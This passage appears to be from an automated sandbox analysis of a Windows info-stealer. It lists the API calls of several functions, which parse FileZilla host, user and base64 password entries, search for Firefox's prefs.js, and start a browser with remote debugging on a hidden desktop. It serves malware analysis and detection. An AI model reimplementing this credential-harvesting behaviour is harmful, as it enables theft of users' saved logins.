                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00FC6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FC6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FC6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00FC6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00FC6ED4
                                  • lstrlen.KERNEL32(?), ref: 00FC6F6E
                                  • lstrlen.KERNEL32(?), ref: 00FC6F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 355f39c50718fac3e110f057e10313abed5ffab91156c9e4a92d8fe8432e06ff
                                  • Instruction ID: 0cf70499f4f2f9a95dd6e232871deb6aaa398550a0602b7a4309a7f9bba0cbee
                                  • Opcode Fuzzy Hash: 355f39c50718fac3e110f057e10313abed5ffab91156c9e4a92d8fe8432e06ff
                                  • Instruction Fuzzy Hash: BB029130E14216ABDB25EBF1DD4AF9E7BBDAF44714F040428F816EB241DB38D941AB61
                                  Function 00FC4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4B7F
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BA7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC4BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 70c8cd5c2504a807a3f2c27f2f71347f07e58cd2e0da99fad8c32f8be76cc0dd
                                  • Instruction ID: 088fdf4ece288f3683b634b78d22dfb0abd6c1019d69437e6f9282e17a9628bb
                                  • Opcode Fuzzy Hash: 70c8cd5c2504a807a3f2c27f2f71347f07e58cd2e0da99fad8c32f8be76cc0dd
                                  • Instruction Fuzzy Hash: 2D926F30A016068FDB28DF69CA59F59B7E5AF44728F1980ADE809DB391D735EC81EF40
                                  Function 00FC1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC12BF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12E7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC133A
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC135C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1376
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC13E2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC140A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1416
                                  • lstrlen.KERNEL32(?), ref: 00FC1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC147A
                                  • StrCmpCA.SHLWAPI(?,01B9D688), ref: 00FC14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1535
                                  • StrCmpCA.SHLWAPI(?,01B9D910), ref: 00FC1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC15E4
                                  • StrCmpCA.SHLWAPI(?,01B9D5C8), ref: 00FC1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1685
                                  • StrCmpCA.SHLWAPI(?,01B9D520), ref: 00FC16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC181C
                                  • FindClose.KERNEL32(00000000), ref: 00FC182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 255a1acc52001b646f4181ba2399a0010eed2830bb631bf5fdd5d6cae900f5eb
                                  • Instruction ID: c5fc89ac02afd847f0ca836dce4f1da03f1c50fd01339497c08def90ab2b8342
                                  • Opcode Fuzzy Hash: 255a1acc52001b646f4181ba2399a0010eed2830bb631bf5fdd5d6cae900f5eb
                                  • Instruction Fuzzy Hash: 9312A070A1020A8BDB24EFB9D98AEAE77F8BF45314F04452CF856D7241DB38DC55AB90
                                  Function 00FCCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCCC13
                                  • lstrcat.KERNEL32(?,?), ref: 00FCCC5F
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCCC71
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCCC8B
                                  • wsprintfA.USER32 ref: 00FCCCB0
                                  • PathMatchSpecA.SHLWAPI(?,01B99248), ref: 00FCCCE2
                                  • CoInitialize.OLE32(00000000), ref: 00FCCCEE
                                    • Part of subcall function 00FCCAE0: CoCreateInstance.COMBASE(00FDB110,00000000,00000001,00FDB100,?), ref: 00FCCB06
                                    • Part of subcall function 00FCCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00FCCB46
                                    • Part of subcall function 00FCCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00FCCBC9
                                  • CoUninitialize.COMBASE ref: 00FCCD09
                                  • lstrcat.KERNEL32(?,?), ref: 00FCCD2E
                                  • lstrlen.KERNEL32(?), ref: 00FCCD3B
                                  • StrCmpCA.SHLWAPI(?,00FDCFEC), ref: 00FCCD55
                                  • wsprintfA.USER32 ref: 00FCCD7D
                                  • wsprintfA.USER32 ref: 00FCCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 00FCCDB0
                                  • wsprintfA.USER32 ref: 00FCCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00FCCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00FCCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 00FCCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 00FCCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FCCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 00FCCF8D
                                  • FindClose.KERNEL32(?), ref: 00FCCF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: c95684adbe000a081e6a2dc1efdecc0994597d51823f63d115a9bfc78098e8b9
                                  • Instruction ID: 8ff338f06f6f3cbfac1f7f9f8d52c0b5c5f968c829409cc3137e300580ca6950
                                  • Opcode Fuzzy Hash: c95684adbe000a081e6a2dc1efdecc0994597d51823f63d115a9bfc78098e8b9
                                  • Instruction Fuzzy Hash: A1C17F719002099BCB64EFA4DD45FEE77B9BF44300F0445A8F51AA7284EB34AE84DFA1
                                  Function 00FC1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC12BF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12E7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC133A
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC135C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1376
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC13E2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC140A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1416
                                  • lstrlen.KERNEL32(?), ref: 00FC1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC147A
                                  • StrCmpCA.SHLWAPI(?,01B9D688), ref: 00FC14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1535
                                  • StrCmpCA.SHLWAPI(?,01B9D910), ref: 00FC1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC181C
                                  • FindClose.KERNEL32(00000000), ref: 00FC182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: f756d32ec2c841d93260b2b1dba3f31d3ec7e29771549757505f2be4fcfca5d0
                                  • Instruction ID: 5718dc058a8eb674ac96fc2eb0c432852422c3e496be25a116a847a67a107125
                                  • Opcode Fuzzy Hash: f756d32ec2c841d93260b2b1dba3f31d3ec7e29771549757505f2be4fcfca5d0
                                  • Instruction Fuzzy Hash: ACC1803191020A9BDB25EFB5DD8ABEE77F8BF41314F04012CB856A7242DB38DC55AB90
                                  Function 00FB9770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00FB9790
                                  • lstrcat.KERNEL32(?,?), ref: 00FB97A0
                                  • lstrcat.KERNEL32(?,?), ref: 00FB97B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00FB97C3
                                  • memset.MSVCRT ref: 00FB97D7
                                    • Part of subcall function 00FD3E70: lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD3EA5
                                    • Part of subcall function 00FD3E70: lstrcpy.KERNEL32(00000000,01B9AA10), ref: 00FD3ECF
                                    • Part of subcall function 00FD3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00FB134E,?,0000001A), ref: 00FD3ED9
                                  • wsprintfA.USER32 ref: 00FB9806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FB9827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FB9844
                                    • Part of subcall function 00FD46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FD46B9
                                    • Part of subcall function 00FD46A0: Process32First.KERNEL32(00000000,00000128), ref: 00FD46C9
                                    • Part of subcall function 00FD46A0: Process32Next.KERNEL32(00000000,00000128), ref: 00FD46DB
                                    • Part of subcall function 00FD46A0: StrCmpCA.SHLWAPI(?,?), ref: 00FD46ED
                                    • Part of subcall function 00FD46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD4702
                                    • Part of subcall function 00FD46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD4711
                                    • Part of subcall function 00FD46A0: CloseHandle.KERNEL32(00000000), ref: 00FD4718
                                    • Part of subcall function 00FD46A0: Process32Next.KERNEL32(00000000,00000128), ref: 00FD4726
                                    • Part of subcall function 00FD46A0: CloseHandle.KERNEL32(00000000), ref: 00FD4731
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB9878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB9889
                                  • lstrcat.KERNEL32(00000000,00FE4B60), ref: 00FB989B
                                  • memset.MSVCRT ref: 00FB98AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FB98D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB9903
                                  • StrStrA.SHLWAPI(00000000,01B9DFE0), ref: 00FB9919
                                  • lstrcpyn.KERNEL32(011E93D0,00000000,00000000), ref: 00FB9938
                                  • lstrlen.KERNEL32(?), ref: 00FB994B
                                  • wsprintfA.USER32 ref: 00FB995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00FB9971
                                  • Sleep.KERNEL32(00001388), ref: 00FB99E7
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB92E1
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB92FA
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB9399
                                    • Part of subcall function 00FB92B0: strlen.MSVCRT ref: 00FB93E6
                                    • Part of subcall function 00FD4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00FD4759
                                    • Part of subcall function 00FD4740: Process32First.KERNEL32(00000000,00000128), ref: 00FD4769
                                    • Part of subcall function 00FD4740: Process32Next.KERNEL32(00000000,00000128), ref: 00FD477B
                                    • Part of subcall function 00FD4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FD479C
                                    • Part of subcall function 00FD4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00FD47AB
                                    • Part of subcall function 00FD4740: CloseHandle.KERNEL32(00000000), ref: 00FD47B2
                                    • Part of subcall function 00FD4740: Process32Next.KERNEL32(00000000,00000128), ref: 00FD47C0
                                    • Part of subcall function 00FD4740: CloseHandle.KERNEL32(00000000), ref: 00FD47CB
                                  • CloseDesktop.USER32(?), ref: 00FB9A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
